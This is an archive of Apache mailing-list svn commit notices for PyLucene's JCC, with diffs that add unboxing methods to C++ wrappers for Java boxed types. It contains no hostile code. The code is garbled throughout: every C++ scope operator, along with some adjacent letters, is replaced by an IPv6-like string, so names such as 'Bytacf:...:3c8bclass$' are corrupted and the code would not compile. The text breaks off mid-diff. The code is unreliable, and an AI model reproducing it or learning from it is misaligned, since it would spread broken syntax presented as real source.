4 Apr 2010 03:20:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1894 invoked by uid 99); 4 Apr 2010 03:20:02 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Apr 2010 03:20:02 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 04 Apr 2010 03:19:59 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id EFD3B23888CC; Sun, 4 Apr 2010 03:19:37 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r930614 - in /lucene/pylucene/trunk/jcc: CHANGES jcc/python.py Date: Sun, 04 Apr 2010 03:19:37 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Sun Apr 4 03:19:35 2010 New Revision: 930614 URL: http://svn.apache.org/viewvc?rev=930614&view=rev Log: - fixed bug with not heeding type parameter for --sequence get method Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/jcc/python.py Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=930614&r1=930613&r2=930614&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Sun Apr 4 03:19:35 2010 @@ -9,6 +9,7 @@ Version 2.5 -> - added support for --find-jvm-dll parameter (Bill Janssen) - fixed bug with not inheriting type parameters to inner parameterized classes - added support for of_() method to set instance type parameters + - fixed bug with not heeding type parameter for --sequence get method - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=930614&r1=930613&r2=930614&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Sun Apr 4 03:19:35 2010 @@ -1295,7 +1295,11 @@ def python(env, out_h, out, cls, superCl not returnType.isPrimitive() and '((jobject) NULL)' or '') line(out, indent + 1, 'OBJ_CALL(result = self->object.%s((%s) n));', methodName, typename(method.getParameterTypes()[0], cls, False)) - line(out, indent + 1, returnValue(cls, returnType, 'result')) + if generics: + line(out, indent + 1, returnValue(cls, returnType, 'result', + method.getGenericReturnType())) + else: + line(out, indent + 1, returnValue(cls, returnType, 'result')) line(out, indent, '}') while indent: From [email protected] Mon Apr 05 20:52:37 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8579 invoked from network); 5 Apr 2010 20:52:37 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 5 Apr 2010 20:52:37 -0000 Received: (qmail 37392 invoked by uid 500); 5 Apr 2010 20:52:37 -0000 Delivered-To: [email protected] Received: (qmail 37367 invoked by uid 500); 5 Apr 2010 20:52:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37359 invoked by uid 99); 5 Apr 2010 20:52:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Apr 2010 20:52:37 +0000 X-ASF-Spam-Status: No, hits=-1259.0 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 05 Apr 2010 20:52:34 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4F57A23888DD; Mon, 5 Apr 2010 20:52:14 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r930958 - in /lucene/pylucene/trunk/jcc: ./ _jcc/java/lang/ jcc/ jcc/sources/ Date: Mon, 05 Apr 2010 20:52:13 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Mon Apr 5 20:52:13 2010 New Revision: 930958 URL: http://svn.apache.org/viewvc?rev=930958&view=rev Log: - parameterized return values are now unboxed Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp (with props) lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h (with props) lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp (with props) lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h (with props) lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp (with props) lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h (with props) lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp (with props) lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h (with props) Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.h lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.h lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.cpp lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.h lucene/pylucene/trunk/jcc/_jcc/java/lang/__init__.cpp lucene/pylucene/trunk/jcc/jcc/python.py lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.cpp lucene/pylucene/trunk/jcc/jcc/sources/JCCEnv.h lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp lucene/pylucene/trunk/jcc/jcc/sources/functions.h Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Mon Apr 5 20:52:13 2010 @@ -10,6 +10,7 @@ Version 2.5 -> - fixed bug with not inheriting type parameters to inner parameterized classes - added support for of_() method to set instance type parameters - fixed bug with not heeding type parameter for --sequence get method + - parameterized return values are now unboxed - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.cpp Mon Apr 5 20:52:13 2010 @@ -22,6 +22,7 @@ namespace java { namespace lang { enum { + mid_booleanValue, max_mid }; @@ -37,7 +38,11 @@ namespace java { { jclass cls = env->findClass("java/lang/Boolean"); - _mids = NULL; + _mids = new jmethodID[max_mid]; + _mids[mid_booleanValue] = + env->getMethodID(cls, "booleanValue", + "()Z"); + class$ = (Class *) new JObject(cls); FALSE = new Boolean(env->getStaticObjectField(cls, "FALSE", "Ljava/lang/Boolean;")); @@ -46,6 +51,11 @@ namespace java { return (jclass) class$->this$; } + + int Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8booleanValue() const + { + return (int) env->callBooleanMethod(this$, _mids[mid_booleanValue]); + } } } Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h Mon Apr 5 20:52:13 2010 @@ -32,6 +32,8 @@ namespace java { initializeClass(); } + int booleanValue() const; + static Boolean *TRUE; static Boolean *FALSE; }; Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp?rev=930958&view=auto ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp (added) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp Mon Apr 5 20:52:13 2010 @@ -0,0 +1,71 @@ +/* + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <jni.h> +#include "JCCEnv.h" +#include "java/lang/Object.h" +#include "java/lang/Class.h" +#include "java/lang/Byte.h" + +namespace java { + namespace lang { + + enum { + mid_byteValue, + max_mid + }; + + Class *Bytacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bclass$ = NULL; + jmethodID *Bytacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b_mids = NULL; + + jclass Bytacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass() + { + if (!class$) + { + jclass cls = env->findClass("java/lang/Byte"); + + _mids = new jmethodID[max_mid]; + _mids[mid_byteValue] = + env->getMethodID(cls, "byteValue", + "()B"); + + class$ = (Class *) new JObject(cls); + } + + return (jclass) class$->this$; + } + + jbyte Bytacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bbyteValue() const + { + return env->callByteMethod(this$, _mids[mid_byteValue]); + } + } +} + + +#include "structmember.h" +#include "functions.h" +#include "macros.h" + +namespace java { + namespace lang { + + static PyMethodDef t_Byte__methods_[] = { + { NULL, NULL, 0, NULL } + }; + + DECLARE_TYPE(Byte, t_Byte, Object, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8byte, + abstract_init, 0, 0, 0, 0, 0); + } +} Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp ------------------------------------------------------------------------------ svn:mime-type = text/plain Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h?rev=930958&view=auto ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h (added) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h Mon Apr 5 20:52:13 2010 @@ -0,0 +1,50 @@ +/* + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#ifndef _Byte_H +#define _Byte_H + +#include <Python.h> +#include "java/lang/Object.h" +#include "java/lang/Class.h" + +namespace java { + namespace lang { + + class Byte : public Object { + public: + static Class *class$; + static jmethodID *_mids; + static jclass initializeClass(); + + explicit Byte(jobject obj) : Object(obj) { + initializeClass(); + } + + jbyte byteValue() const; + }; + + extern PyTypeObject Byte$$Type; + + class t_Byte { + public: + PyObject_HEAD + Byte object; + static PyObject *wrap_Object(const Byte& object); + static PyObject *wrap_jobject(const jobject& object); + }; + } +} + +#endif /* _Byte_H */ Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h ------------------------------------------------------------------------------ svn:mime-type = text/plain Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp?rev=930958&view=auto ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp (added) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp Mon Apr 5 20:52:13 2010 @@ -0,0 +1,71 @@ +/* + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <jni.h> +#include "JCCEnv.h" +#include "java/lang/Object.h" +#include "java/lang/Class.h" +#include "java/lang/Character.h" + +namespace java { + namespace lang { + + enum { + mid_charValue, + max_mid + }; + + Class *Characteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8blass$ = NULL; + jmethodID *Characteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8b_mids = NULL; + + jclass Characteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass() + { + if (!class$) + { + jclass cls = env->findClass("java/lang/Character"); + + _mids = new jmethodID[max_mid]; + _mids[mid_charValue] = + env->getMethodID(cls, "charValue", + "()C"); + + class$ = (Class *) new JObject(cls); + } + + return (jclass) class$->this$; + } + + jchar Characteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bharValue() const + { + return env->callCharMethod(this$, _mids[mid_charValue]); + } + } +} + + +#include "structmember.h" +#include "functions.h" +#include "macros.h" + +namespace java { + namespace lang { + + static PyMethodDef t_Character__methods_[] = { + { NULL, NULL, 0, NULL } + }; + + DECLARE_TYPE(Character, t_Character, Object, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bharacter, + abstract_init, 0, 0, 0, 0, 0); + } +} Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp ------------------------------------------------------------------------------ svn:mime-type = text/plain Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h?rev=930958&view=auto ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h (added) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h Mon Apr 5 20:52:13 2010 @@ -0,0 +1,50 @@ +/* + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#ifndef _Character_H +#define _Character_H + +#include <Python.h> +#include "java/lang/Object.h" +#include "java/lang/Class.h" + +namespace java { + namespace lang { + + class Character : public Object { + public: + static Class *class$; + static jmethodID *_mids; + static jclass initializeClass(); + + explicit Character(jobject obj) : Object(obj) { + initializeClass(); + } + + jchar charValue() const; + }; + + extern PyTypeObject Character$$Type; + + class t_Character { + public: + PyObject_HEAD + Character object; + static PyObject *wrap_Object(const Character& object); + static PyObject *wrap_jobject(const jobject& object); + }; + } +} + +#endif /* _Character_H */ Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.cpp?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.cpp Mon Apr 5 20:52:13 2010 @@ -23,6 +23,7 @@ namespace java { enum { mid__init_, + mid_doubleValue, max_mid }; @@ -37,6 +38,8 @@ namespace java { _mids = new jmethodID[max_mid]; _mids[mid__init_] = env->getMethodID(cls, "<init>", "(D)V"); + _mids[mid_doubleValue] = + env->getMethodID(cls, "doubleValue", "()D"); class$ = (Class *) new JObject(cls); } @@ -46,6 +49,11 @@ namespace java { Doublacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bDouble(jdouble n) : Object(env->newObject(initializeClass, &_mids, mid__init_, n)) { } + + jdouble Doublacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bdoubleValue() const + { + return env->callDoubleMethod(this$, _mids[mid_doubleValue]); + } } } Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.h?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Double.h Mon Apr 5 20:52:13 2010 @@ -32,6 +32,8 @@ namespace java { initializeClass(); } Double(jdouble); + + jdouble doubleValue() const; }; extern PyTypeObject Double$$Type; Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp?rev=930958&view=auto ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp (added) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp Mon Apr 5 20:52:13 2010 @@ -0,0 +1,71 @@ +/* + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <jni.h> +#include "JCCEnv.h" +#include "java/lang/Object.h" +#include "java/lang/Class.h" +#include "java/lang/Float.h" + +namespace java { + namespace lang { + + enum { + mid_floatValue, + max_mid + }; + + Class *Floatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blass$ = NULL; + jmethodID *Floatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b_mids = NULL; + + jclass Floatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass() + { + if (!class$) + { + jclass cls = env->findClass("java/lang/Float"); + + _mids = new jmethodID[max_mid]; + _mids[mid_floatValue] = + env->getMethodID(cls, "floatValue", + "()F"); + + class$ = (Class *) new JObject(cls); + } + + return (jclass) class$->this$; + } + + jfloat Floatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bloatValue() const + { + return env->callFloatMethod(this$, _mids[mid_floatValue]); + } + } +} + + +#include "structmember.h" +#include "functions.h" +#include "macros.h" + +namespace java { + namespace lang { + + static PyMethodDef t_Float__methods_[] = { + { NULL, NULL, 0, NULL } + }; + + DECLARE_TYPE(Float, t_Float, Object, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bloat, + abstract_init, 0, 0, 0, 0, 0); + } +} Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp ------------------------------------------------------------------------------ svn:mime-type = text/plain Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h?rev=930958&view=auto ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h (added) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h Mon Apr 5 20:52:13 2010 @@ -0,0 +1,50 @@ +/* + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#ifndef _Float_H +#define _Float_H + +#include <Python.h> +#include "java/lang/Object.h" +#include "java/lang/Class.h" + +namespace java { + namespace lang { + + class Float : public Object { + public: + static Class *class$; + static jmethodID *_mids; + static jclass initializeClass(); + + explicit Float(jobject obj) : Object(obj) { + initializeClass(); + } + + jfloat floatValue() const; + }; + + extern PyTypeObject Float$$Type; + + class t_Float { + public: + PyObject_HEAD + Float object; + static PyObject *wrap_Object(const Float& object); + static PyObject *wrap_jobject(const jobject& object); + }; + } +} + +#endif /* _Float_H */ Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.cpp?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.cpp Mon Apr 5 20:52:13 2010 @@ -23,6 +23,7 @@ namespace java { enum { mid__init_, + mid_intValue, max_mid }; @@ -37,6 +38,8 @@ namespace java { _mids = new jmethodID[max_mid]; _mids[mid__init_] = env->getMethodID(cls, "<init>", "(I)V"); + _mids[mid_intValue] = + env->getMethodID(cls, "intValue", "()I"); class$ = (Class *) new JObject(cls); } @@ -46,6 +49,11 @@ namespace java { Integeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bInteger(jint n) : Object(env->newObject(initializeClass, &_mids, mid__init_, n)) { } + + jint Integeracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bintValue() const + { + return env->callIntMethod(this$, _mids[mid_intValue]); + } } } Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.h?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Integer.h Mon Apr 5 20:52:13 2010 @@ -32,6 +32,8 @@ namespace java { initializeClass(); } Integer(jint); + + jint intValue() const; }; extern PyTypeObject Integer$$Type; Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.cpp?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.cpp Mon Apr 5 20:52:13 2010 @@ -23,6 +23,7 @@ namespace java { enum { mid__init_, + mid_longValue, max_mid }; @@ -37,6 +38,8 @@ namespace java { _mids = new jmethodID[max_mid]; _mids[mid__init_] = env->getMethodID(cls, "<init>", "(J)V"); + _mids[mid_longValue] = + env->getMethodID(cls, "longValue", "()J"); class$ = (Class *) new JObject(cls); } @@ -46,6 +49,11 @@ namespace java { Longacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLong(jlong n) : Object(env->newObject(initializeClass, &_mids, mid__init_, n)) { } + + jlong Longacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blongValue() const + { + return env->callLongMethod(this$, _mids[mid_longValue]); + } } } Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.h?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Long.h Mon Apr 5 20:52:13 2010 @@ -32,6 +32,8 @@ namespace java { initializeClass(); } Long(jlong); + + jlong longValue() const; }; extern PyTypeObject Long$$Type; Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp?rev=930958&view=auto ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp (added) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp Mon Apr 5 20:52:13 2010 @@ -0,0 +1,71 @@ +/* + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <jni.h> +#include "JCCEnv.h" +#include "java/lang/Object.h" +#include "java/lang/Class.h" +#include "java/lang/Short.h" + +namespace java { + namespace lang { + + enum { + mid_shortValue, + max_mid + }; + + Class *Shortacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blass$ = NULL; + jmethodID *Shortacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b_mids = NULL; + + jclass Shortacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass() + { + if (!class$) + { + jclass cls = env->findClass("java/lang/Short"); + + _mids = new jmethodID[max_mid]; + _mids[mid_shortValue] = + env->getMethodID(cls, "shortValue", + "()S"); + + class$ = (Class *) new JObject(cls); + } + + return (jclass) class$->this$; + } + + jshort Shortacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bshortValue() const + { + return env->callShortMethod(this$, _mids[mid_shortValue]); + } + } +} + + +#include "structmember.h" +#include "functions.h" +#include "macros.h" + +namespace java { + namespace lang { + + static PyMethodDef t_Short__methods_[] = { + { NULL, NULL, 0, NULL } + }; + + DECLARE_TYPE(Short, t_Short, Object, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bShort, + abstract_init, 0, 0, 0, 0, 0); + } +} Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp ------------------------------------------------------------------------------ svn:mime-type = text/plain Added: lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h?rev=930958&view=auto ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h (added) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h Mon Apr 5 20:52:13 2010 @@ -0,0 +1,50 @@ +/* + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#ifndef _Short_H +#define _Short_H + +#include <Python.h> +#include "java/lang/Object.h" +#include "java/lang/Class.h" + +namespace java { + namespace lang { + + class Short : public Object { + public: + static Class *class$; + static jmethodID *_mids; + static jclass initializeClass(); + + explicit Short(jobject obj) : Object(obj) { + initializeClass(); + } + + jshort shortValue() const; + }; + + extern PyTypeObject Short$$Type; + + class t_Short { + public: + PyObject_HEAD + Short object; + static PyObject *wrap_Object(const Short& object); + static PyObject *wrap_jobject(const jobject& object); + }; + } +} + +#endif /* _Short_H */ Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/__init__.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/__init__.cpp?rev=930958&r1=930957&r2=930958&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/__init__.cpp (original) +++ 